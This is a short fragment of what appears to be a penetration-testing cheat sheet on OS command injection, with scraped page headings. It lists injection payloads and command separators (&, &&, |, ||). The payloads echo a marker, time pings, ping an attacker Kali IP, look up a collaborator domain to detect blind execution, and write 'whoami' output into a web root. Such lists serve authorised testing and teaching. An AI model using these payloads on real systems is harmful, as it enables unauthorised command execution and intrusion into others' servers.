Exploitation
& echo test123 && ping -c 10 127.0.0.1 &tcpdump -i <NETWORK_CARD> icmp& ping <KALI_IP> && nslookup collaborator-link.net && whoami > /var/www/static/whoami.txt &Command seperators
&
&&
|
||More command seperators
Inline Command Execution (Linux)
Check if command is executed via cmd or powershell
Last updated